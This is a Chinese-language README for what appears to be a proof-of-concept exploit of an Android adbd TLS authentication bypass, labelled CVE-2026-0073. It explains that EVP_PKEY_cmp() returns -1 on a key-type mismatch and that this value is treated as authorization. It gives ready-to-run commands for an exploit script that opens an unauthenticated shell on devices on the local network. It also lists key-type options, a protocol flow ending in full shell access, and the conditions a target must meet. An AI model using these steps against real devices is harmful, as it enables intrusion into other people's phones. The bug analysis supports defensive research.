
Android ADB 守护进程(adbd)中存在一个严重认证绕过漏洞,允许本地网络上的任何攻击者在未经用户授权的情况下获取目标设备的完整 shell。
该漏洞存在于 daemon/auth.cpp 中的 adbd_tls_verify_cert() 函数内,其中 EVP_PKEY_cmp() 被当作布尔值使用。当存储的密钥为 RSA 且提交的 TLS 客户端证书携带非 RSA 密钥(EC P-256 或 Ed25519)时,EVP_PKEY_cmp() 返回 -1(类型不匹配),而该值在 C/C++ 中为真值,因此 authorized = true。
// daemon/auth.cpp 中的漏洞代码模式
if (EVP_PKEY_cmp(peer_key, stored_key)) { // ← 漏洞:-1 为真值!
authorized = true;
}
pip install cryptography
# 交互式 shell
python adb_tls_auth_bypass.py <目标IP> <端口>
# 单条命令执行
python adb_tls_auth_bypass.py 192.168.1.42 37521 --cmd "id"
# 详细模式(查看完整协议跟踪)
python adb_tls_auth_bypass.py 192.168.1.42 37521 -v --cmd "id"
python adb_tls_auth_bypass.py 192.168.1.42 5555 --key-type ec
python adb_tls_auth_bypass.py 192.168.1.42 5555 --key-type ed25519
默认情况下,脚本会自动依次尝试 EC P-256 → Ed25519 → EC/TLS 1.2,直到其中一种成功。
攻击者 目标(adbd)
│ │
│──── TCP 连接 ────────────────────►│
│──── CNXN(明文)────────────────►│
│◄─── STLS(TLS 升级请求)────────│
│──── STLS 回复 ──────────────────►│
│ │
│════ TLS 1.3 握手 ════════════════│
│ (提交 EC P-256 客户端证书) │
│ EVP_PKEY_cmp(EC, RSA) → -1 │
│ -1 为真值 → authorized=true │
│════════════════════════════════════│
│ │
│◄─── CNXN(设备信息)────────────│
│──── OPEN "shell:" ───────────────►│
│◄─── OKAY ────────────────────────│
│◄──► WRTE/OKAY(shell 输入/输出)►│
│ │
[完整 shell 访问权限] │
| 要求 | 详情 |
|---|---|
| 开发者选项 | 目标设备上已启用 |
⚠️ 重要提示: RSA 密钥必须位于
/data/misc/adb/adb_keys中,该文件通过 USB 调试配对(接受"允许 USB 调试?"对话框)生成。无线调试配对(adb pair)将密钥存储在不同位置(adb_known_hosts.pb),不满足此要求。
adb shell getprop ro.build.version.security_patch
已在以下环境中测试并确认可用:
内核: 6.1.23-android14-4-00257-g7e35917775b8-ab9964412
平台: Android 14(Android Studio 模拟器)
本分支包含多项增强功能:
select(),实现跨平台支持-v 标志提供详细的协议跟踪CVE-2026-0073-Android-ADBD-bypass-POC/
├── adb_tls_auth_bypass.py # 主漏洞利用脚本
└── README.md # 本文件
本工具仅供授权安全测试和教育目的使用。未经授权访问计算机系统属于违法行为。请务必在测试前获得适当授权。作者不对本软件的滥用承担任何责任。
如果这对你的研究有帮助,请点个 ⭐
EVP_PKEY_cmp() 返回值 | 含义 | 在 C 中为真? | 结果 |
|---|
1 | 密钥匹配 | ✅ | 已授权(正确) |
0 | 密钥不同 | ❌ | 已拒绝(正确) |
-1 | 类型不匹配 | ✅ | 已授权(漏洞) |
| 无线调试 |
| 已启用(或通过 TCP 端口 5555 使用 ADB) |
| 已存储的 RSA 密钥 | 设备必须至少通过 USB 配对过一次(/data/misc/adb/adb_keys) |
| 网络访问 | 攻击者必须能够访问 adbd 的 TCP 端口 |